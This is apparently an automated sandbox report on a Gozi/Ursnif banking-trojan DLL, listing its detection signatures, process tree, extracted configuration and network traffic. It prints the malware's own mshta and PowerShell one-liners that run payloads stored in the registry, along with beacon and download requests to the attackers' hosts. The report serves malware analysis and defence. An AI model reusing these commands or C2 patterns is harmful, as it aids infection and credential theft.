Play interactive tour

Edit tour

Analysis Report NJPcHPuRcG.dll

Overview

General Information

Sample Name:	NJPcHPuRcG.dll
Analysis ID:	353243
MD5:	48ac334e786156ef605b82dd563373f4
SHA1:	1710cf3539eaaf618a613e690157adf30550fade
SHA256:	71b928fd0b29e21bbfa4755b5347f4dc40653a82ec7ecf4947e325dbec23abaa
Tags:	dllGoziISFBUrsnif
Most interesting Screenshot:

Detection

Gozi Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Gozi e-Banking trojan

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: Dot net compiler compiles file from suspicious location

Yara detected Ursnif

Changes memory attributes in foreign processes to executable or writable

Compiles code for process injection (via .Net compiler)

Creates a thread in another existing process (thread injection)

Disables SPDY (HTTP compression, likely to perform web injects)

Hooks registry keys query functions (used to hide registry keys)

Injects code into the Windows Explorer (explorer.exe)

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the export address table of user mode modules (user mode EAT hooks)

Modifies the import address table of user mode modules (user mode IAT hooks)

Modifies the prolog of user mode functions (user mode inline hooks)

Sigma detected: MSHTA Spawning Windows Shell

Suspicious powershell command line found

Tries to steal Mail credentials (via file access)

Writes or reads registry keys via WMI

Writes registry values via WMI

Writes to foreign memory regions

Compiles C# or VB.Net code

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query CPU information (cpuid)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file does not import any functions

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Registers a DLL

Searches for the Microsoft Outlook file path

Sigma detected: Suspicious Rundll32 Activity

Tries to load missing DLLs

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Startup

System is w10x64

loaddll32.exe (PID: 6432 cmdline: loaddll32.exe 'C:\Users\user\Desktop\NJPcHPuRcG.dll' MD5: 8081BC925DFC69D40463079233C90FA5)

regsvr32.exe (PID: 6448 cmdline: regsvr32.exe /s C:\Users\user\Desktop\NJPcHPuRcG.dll MD5: 426E7499F6A7346F0410DEAD0805586B)

control.exe (PID: 6768 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)

rundll32.exe (PID: 5052 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)

cmd.exe (PID: 6456 cmdline: C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

iexplore.exe (PID: 6488 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 6532 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 6968 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:82962 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

cvtres.exe (PID: 4192 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8CA0.tmp' 'c:\Users\user\AppData\Local\Temp\yacmzdf3\CSCE6DA2C7C1B814D8F891E10CFF0A5BBCE.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

iexplore.exe (PID: 1276 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17422 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 1752 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17430 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

mshta.exe (PID: 4676 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)

powershell.exe (PID: 5140 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 5148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

csc.exe (PID: 5724 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 1268 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES78AB.tmp' 'c:\Users\user\AppData\Local\Temp\mu1rnx1a\CSC6647FE8FE542539CE2919E5B6D2D1D.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

csc.exe (PID: 6968 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)

explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "version": "250180", "uptime": "153", "system": "a271e0af49f6ad8f6473361d635135dbhh", "size": "202829", "crc": "2", "action": "00000000", "id": "1100", "time": "1613453205", "user": "1082ab698695dc15e71ab15cb0e88a2a", "hash": "0xf857f57e", "soft": "3"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.328188279.0000000004F38000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp	GoziRule	Win32.Gozi	CCN-CERT	0x8f0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ...
00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.328320558.0000000004F38000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.328226726.0000000004F38000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.328337032.0000000004F38000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.328359150.0000000004F38000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.328350143.0000000004F38000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.328266588.0000000004F38000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.328300905.0000000004F38000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.336044765.0000000004DBB000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: regsvr32.exe PID: 6448	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 9 entries

Sigma Overview

System Summary:

Sigma detected: Dot net compiler compiles file from suspicious location

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5140, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.cmdline', ProcessId: 5724

Sigma detected: MSHTA Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4676, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ProcessId: 5140

Sigma detected: Suspicious Rundll32 Activity

Show sources

Source: Process started

Author: juju4: Data: Command: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 6768, ProcessCommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, ProcessId: 5052

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: regsvr32.exe.6448.2.memstr

Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250180", "uptime": "153", "system": "a271e0af49f6ad8f6473361d635135dbhh", "size": "202829", "crc": "2", "action": "00000000", "id": "1100", "time": "1613453205", "user": "1082ab698695dc15e71ab15cb0e88a2a", "hash": "0xf857f57e", "soft": "3"}

Multi AV Scanner detection for submitted file

Show sources

Source: NJPcHPuRcG.dll

Virustotal: Detection: 15%

Perma Link

Compliance:

Uses 32bit PE files

Show sources

Source: NJPcHPuRcG.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Uses secure TLS version for HTTPS connections

Show sources

Source: unknown	HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.5:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.5:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49750 version: TLS 1.2

Binary contains paths to debug symbols

Show sources

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001B.00000002.386301089.000001BF2C130000.00000002.00000001.sdmp, csc.exe, 0000001E.00000002.395773551.0000021C02EB0000.00000002.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000024.00000000.426711747.0000000006FE0000.00000002.00000001.sdmp
Source:	Binary string: ntdll.pdb source: regsvr32.exe, 00000002.00000003.399265085.0000000005970000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: explorer.exe, 00000024.00000003.471981638.0000000006C40000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000002.00000003.399265085.0000000005970000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: explorer.exe, 00000024.00000003.471981638.0000000006C40000.00000004.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000024.00000000.426711747.0000000006FE0000.00000002.00000001.sdmp

Spreading:

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_02773512 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,	2_2_02773512
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05415518 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	2_2_05415518
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05404CF1 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	2_2_05404CF1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0540B88D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	2_2_0540B88D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0540834C RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,	2_2_0540834C

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_054016E1 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,

2_2_054016E1

Networking:

Source: global traffic

HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at

Source: Joe Sandbox View

IP Address: 104.20.184.68 104.20.184.68

Source: Joe Sandbox View

JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c

Source: global traffic	HTTP traffic detected: GET /api1/QSqnACLeyr6hdgRM/z5FskeEfxxW4Q1R/GsITkxgk46HCnUm5Kd/11eB4QB_2/FS2OIfou_2BVahhCN2i1/lN05g44fSdWuZ34SVM_/2F18tQh3ZP_2B9CZltVRIM/NAJawsHjH4mX4/XILaVciO/5e8TUIFZ7ccd8Dn_2F8wtDN/DA_2BihyHs/BqbIiQ7x5yFYJOUsg/scHsHuDvL_2F/a38zFWCcfG3/xo4sCKeZx_2FgB/qzrd3KTzhXtd1iKJfTVBW/TIaj2x4Rf3CB0n8w/wlBMav7PHwJXLsZ/IliJcWNYhk60Yrdjmm/3OHtbL5dY/ANYcc2W_2Bf_2FIiYenV/jXNvqJX5m02G5/F HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/9a3FdV_2FOe2lNWBzywhye/a2rzbdQuOhRbh/1tMI9TP_/2FFHpcEjc2zIsj3nY_2FaRD/bbKOnK6Aw9/T9Li8ZpaG0hs_2FEE/_2B0kgl3vplN/HPMJmXJvTbm/kjHzz19HUtkaT1/4BDTN7ZVSNKtMR3H5nP4a/s8_2F3CxujepwtCo/By36bxNYadNwz_2/FEk2aSXfXLicJH7n4U/7D_2FTfi5/cc2nrD5Ag2qXRkQmnDt6/1GTWH5aoTuyoAdeDUx1/UqFEv13ML45n9P1f5D7a2h/spqio1V138YVU/_2FSoCJL/_2BPfPH_2FwmC1xDPsgb90b/lJFlQYaXBd/gV1Ci2eCEez/TspIchn HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/aE3Chvy15YwtGBM5c3w/ZiymrrSsY1vMIEeQ79sLxc/QkfYDB83GeV6h/wfm_2Fba/IxaOhm6BSIFzHirA83QDIG_/2FbmOJUxF8/ud5_2Fql9hZq1SzAT/Mwor9Yan0pTL/Fp7ZNYW1P4i/kA3p_2Ft9A_2Fs/RuUNpyL5CsQBX14_2BDvT/1fDvmlCtb0dss45p/clOsmGOkIAiGzqR/LxhkYHtCoZLc014ID_/2BtL4MOOe/oIJGNpJMiO7LF1VXD1cY/3TSy0R_2FzpOndwhSFh/jEmLA5uqXYEdrQwipf8a_2/FYxkdf4zOPfe0/vr4tnHHd/_2Fh2Azy7z8mKYRQWXwGF6y/SDOEEBL HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
Source: global traffic	HTTP traffic detected: GET /api1/7SpKvNZQZWoR0wQKCmN1/KD_2BPey7M6A4sknzph/Ip3VpPOQqmnCvT_2B_2BK5/4r2K_2B3wW0f3/JdFGceR8/sN9tQwx3x3JWJ2dzvoaA_2F/7bnKlxAsYe/gSbjUWPJM3O0NeIou/EZHWrqNzUS0t/SJ53k6qr4k5/xiOJ1_2BbyKtK4/Tnf2QRNkKddPRNN_2Fkyp/65kWXGWip9M43opO/J4Nq71H0yPbyFLs/r9xzWAiWquka5b9cWG/7jyYbvLwX/YHG6XBsznTAJKxK3VHeE/SrFheeplHdah6LyL5hX/KC_2BG8oiks28NBuCaE6gf/tQuPh0 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Host: api3.lepini.at
Source: global traffic	HTTP traffic detected: GET /api1/AV8RjqvumRQ/OvLh7PdTNMKGa7/3LP4_2BG3LRcoZojWSk5u/NsORJjPn_2Fv_2B1/6Rz2NQs3_2FAyK6/XQQdYcU_2Fse_2F2j3/Zr9Hx_2Ba/98olXIGwinJCl_2FG4zm/M7DRWkrkSQ3KxF_2B9c/y19JwEmq4VBfpQCfptESLl/3GITd_2BqQxr2/SZAx9P1V/YikBhoAaQcpPJtcNJcJIY1_/2BjEuQfwCu/DUjEswX2uyguNEfAU/ZGf5P4bm4kOR/ZxxrQAreiF2/UPHWjC6fJcwkvj/jLEwRcMGH9odoyp8GuEAA/_2BQntTJU4ER5IW5/BN_2BQxL/y8vbI87 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Host: api3.lepini.at

Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000024.00000000.431527658.0000000008B68000.00000004.00000001.sdmp	String found in binary or memory: :2021021520210216: user@https://www.msn.com/de-ch/?ocid=iehpMSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365 equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000024.00000000.431527658.0000000008B68000.00000004.00000001.sdmp	String found in binary or memory: :2021021520210216: user@https://www.msn.com/de-ch/?ocid=iehpMSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 3653 equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000024.00000000.431527658.0000000008B68000.00000004.00000001.sdmp	String found in binary or memory: :2021021520210216: user@https://www.msn.com/de-ch/?ocid=iehpMSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365g equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: www.msn.com

Source: unknown

HTTP traffic detected: POST /api1/bXII_2FHb0focJwi2/NKTIw_2FgiKf/ws9atmb5xre/8ghQ36n3SNQg84/1PN9WyLcQDb7Ra3wHIhjp/FiUmpJqa00TMQIaH/_2BHj0Q4IM1ltM6/5khUyF_2BRsPcD5Q37/C_2FE9BKN/CafUcW267Vk_2FIY_2Bn/_2BcfZsnCXmPwjFlUTt/pXytrrnaXNmzXOHxla9mOU/6X7At_2B8RTFx/TPw_2FzM/jbcnoszV5Xhd9jlATPIAobN/UMGaXl3YDQ/Krg2ExScIQW_2Fg_2/BTQ5TzTymRNC/sxopWB80XHY/7SN_2FkITnVhH7/8XPMTwHoJBXOcWd_2Fyk4/T_2Bzs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Content-Length: 2Host: api3.lepini.at

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 15 Feb 2021 20:26:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Source: explorer.exe, 00000024.00000000.435967588.000000000F120000.00000002.00000001.sdmp	String found in binary or memory: http://%s.com
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000024.00000000.435365866.000000000DC20000.00000004.00000001.sdmp	String found in binary or memory: http://api10.laptok.at/api1/aE3Chvy15YwtGBM5c3w/ZiymrrSsY1vMIEeQ79sLxc/QkfYDB83GeV6h/wfm_2Fba/IxaOhm
Source: explorer.exe, 00000024.00000002.622432567.00000000053A0000.00000004.00000001.sdmp	String found in binary or memory: http://api3.lepini.at/api1/7SpKvNZQZWoR0wQKCmN1/KD_2BPey7M6A4sknzph/Ip3VpPOQqmnCvT_2B_2BK5/4r2K_2B3w
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.435967588.000000000F120000.00000002.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
